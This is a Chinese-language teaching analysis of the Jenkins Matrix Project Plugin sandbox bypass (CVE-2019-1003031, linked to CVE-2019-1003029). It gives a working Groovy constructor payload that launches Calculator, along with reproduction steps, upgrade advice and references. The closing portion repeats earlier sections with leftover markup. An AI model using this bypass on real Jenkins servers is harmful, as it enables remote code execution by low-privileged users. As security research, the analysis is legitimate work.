Jenkins Matrix Project Plugin 沙箱绕过漏洞分析 (CVE-2019-1003031)<\/h1>

漏洞概述<\/h2>
本教学文档详细分析 Jenkins Matrix Project Plugin 中的沙箱绕过漏洞 (CVE-2019-1003031)，该漏洞与 Script Security Plugin 的另一个沙箱绕过漏洞 (CVE-2019-1003029) 相关联，可导致权限提升和远程代码执行。<\/p>

受影响组件<\/h2>

1. Matrix Project Plugin<\/h3>

功能<\/strong>：用于构建"多配置项目"，如多环境测试、平台指定构建等<\/li>
漏洞版本<\/strong>：<= 1.13<\/li>
修复版本<\/strong>：1.14 或以上<\/li>

利用条件<\/strong>：具有 Job\/Configure 权限的用户<\/li> <\/ul>
2. Script Security Plugin<\/h3>

功能<\/strong>：管理普通用户执行 Groovy 脚本的权限<\/li>
漏洞版本<\/strong>：<= 1.53<\/li>
修复版本<\/strong>：1.54 或以上（考虑 CVE-2019-1003040，建议升级到 1.56 或以上）<\/li>
利用条件<\/strong>：具有 Overall\/Read 权限的用户<\/li> <\/ul>
漏洞背景<\/h2>
Matrix Project Plugin 在配置过程中接受用户指定的 Groovy Script，在版本 <=1.13 中存在沙箱绕过漏洞。该漏洞需要结合 Script Security Plugin 的沙箱绕过漏洞 (CVE-2019-1003029) 来实现完整的利用。<\/p>
漏洞分析<\/h2>
漏洞位置<\/h3>

Matrix Project Plugin<\/strong>：hudson\/matrix\/FilterScript.java<\/code> 的 evaluate()<\/code> 方法<\/li>
调用栈<\/strong>： parse:117, FilterScript (hudson.matrix) parse:105, FilterScript (hudson.matrix) evalGroovyExpression:101, Combination (hudson.matrix) evalGroovyExpression:91, Combination (hudson.matrix) rebuildConfigurations:658, MatrixProject (hudson.matrix) submit:959, MatrixProject (hudson.matrix) doConfigSubmit:1350, Job (hudson.model) doConfigSubmit:772, AbstractProject (hudson.model) <\/code><\/pre> <\/li> <\/ul> 漏洞利用尝试<\/h3> 初始尝试<\/strong>：<\/p> (<\/span>new<\/span> java.<\/span>lang<\/span>.<\/span>ProcessBuilder<\/span>(<\/span>"\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>).<\/span>start<\/span>())==<\/span>""<\/span> <\/span><\/span><\/code><\/pre> 结果：无法调用 ProcessBuilder<\/code>，被 Script Security 插件拦截<\/li> <\/ul> <\/li> 反射尝试<\/strong>：<\/p> (<\/span>""<\/span>.<\/span>getClass<\/span>().<\/span>forName<\/span>(<\/span>"java.lang.Runtime"<\/span>).<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>,<\/span>null<\/span>).<\/span>invoke<\/span>(<\/span>null<\/span>,<\/span>null<\/span>).<\/span>exec<\/span>(<\/span>"\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>))==<\/span>""<\/span> <\/span><\/span><\/code><\/pre> 结果：仍然被拦截<\/li> <\/ul> <\/li> <\/ol> 有效利用方法<\/h3> 通过分析修复提交和评论，发现可以通过在类构造函数中执行代码来绕过限制：<\/p> class<\/span> poc<\/span> {<\/span> <\/span><\/span> poc(){<\/span> <\/span><\/span> "\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>.<\/span>execute<\/span>()<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键点<\/strong>：<\/p> 不使用 public<\/code> 关键字（会被拦截）<\/li> 在类构造函数中执行命令<\/li> 使用 String.execute()<\/code> 方法而非直接调用 Runtime<\/code> 或 ProcessBuilder<\/code><\/li> <\/ul> 修复分析<\/h3> 修复提交中提到了 DoNotRunConstructor<\/code> 类，表明修复重点是防止在构造函数中执行代码：<\/p> Matrix Project Plugin 修复提交<\/strong>： https:\/\/github.com\/jenkinsci\/matrix-project-plugin\/commit\/765fc39694b31f8dd6e3d27cf51d1708b5df2be7<\/p> <\/li> Script Security Plugin 修复提交<\/strong>： https:\/\/github.com\/jenkinsci\/script-security-plugin\/commit\/f2649a7c0757aad0f6b4642c7ef0dd44c8fea434<\/p> <\/li> <\/ol> 漏洞复现步骤<\/h2> 环境准备<\/strong>：<\/p> Jenkins: 1.150.3<\/li> Matrix Project Plugin: 1.13<\/li> Script Security Plugin: 1.53<\/li> <\/ul> <\/li> 利用过程<\/strong>：<\/p> 以具有 Job\/Configure 权限的用户登录<\/li> 新建 Job，选择"构建一个多配置项目"<\/li> 在配置页面的"组合过滤器"中输入恶意 Groovy 脚本： class<\/span> poc<\/span> {<\/span> <\/span><\/span> poc(){<\/span> <\/span><\/span> "\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator"<\/span>.<\/span>execute<\/span>()<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> 提交配置触发漏洞<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 升级<\/strong>：<\/p> 将 Matrix Project Plugin 升级到 1.14 或更高版本<\/li> 将 Script Security Plugin 升级到 1.56 或更高版本（考虑 CVE-2019-1003040）<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 严格控制 Job\/Configure 权限<\/li> 遵循最小权限原则<\/li> <\/ul> <\/li> 监控<\/strong>：<\/p> 监控可疑的 Groovy 脚本执行<\/li> 审计配置更改日志<\/li> <\/ul> <\/li> <\/ol> 参考链接<\/h2> Jenkins 安全公告：<\/p> https:\/\/jenkins.io\/security\/advisory\/2019-03-06\/#SECURITY-1339<\/li> https:\/\/jenkins.io\/security\/advisory\/2019-03-06\/#SECURITY-1336<\/li> <\/ul> <\/li> NVD 条目：<\/p> https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-1003031<\/li> https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2019-1003029<\/li> <\/ul> <\/li> 相关技术分析：<\/p> https:\/\/blog.orange.tw\/2019\/02\/abusing-meta-programming-for-unauthenticated-rce.html<\/li> https:\/\/www.lucifaer.com\/2019\/03\/04\/Jenkins%20RCE%E5%88%86%E6%9E%90%EF%BC%88CVE-2018-1000861%E5%88%86%E6%9E%90%EF%BC%89\/<\/li> <\/ul> <\/li> Groovy 官方文档：<\/p> https:\/\/groovy-lang.org\/documentation.html<\/li> <\/ul> <\/li> <\/ol>

Jenkins Matrix Project Plugin 沙箱绕过漏洞分析 (CVE-2019-1003031)<\/h1>

漏洞概述<\/h2> 本教学文档详细分析 Jenkins Matrix Project Plugin 中的沙箱绕过漏洞 (CVE-2019-1003031)，该漏洞与 Script Security Plugin 的另一个沙箱绕过漏洞 (CVE-2019-1003029) 相关联，可导致权限提升和远程代码执行。<\/p>

受影响组件<\/h2>

漏洞背景<\/h2> Matrix Project Plugin 在配置过程中接受用户指定的 Groovy Script，在版本 <=1.13 中存在沙箱绕过漏洞。该漏洞需要结合 Script Security Plugin 的沙箱绕过漏洞 (CVE-2019-1003029) 来实现完整的利用。<\/p>

漏洞分析<\/h2>

漏洞概述<\/h2>
本教学文档详细分析 Jenkins Matrix Project Plugin 中的沙箱绕过漏洞 (CVE-2019-1003031)，该漏洞与 Script Security Plugin 的另一个沙箱绕过漏洞 (CVE-2019-1003029) 相关联，可导致权限提升和远程代码执行。<\/p>

漏洞背景<\/h2>
Matrix Project Plugin 在配置过程中接受用户指定的 Groovy Script，在版本 <=1.13 中存在沙箱绕过漏洞。该漏洞需要结合 Script Security Plugin 的沙箱绕过漏洞 (CVE-2019-1003029) 来实现完整的利用。<\/p>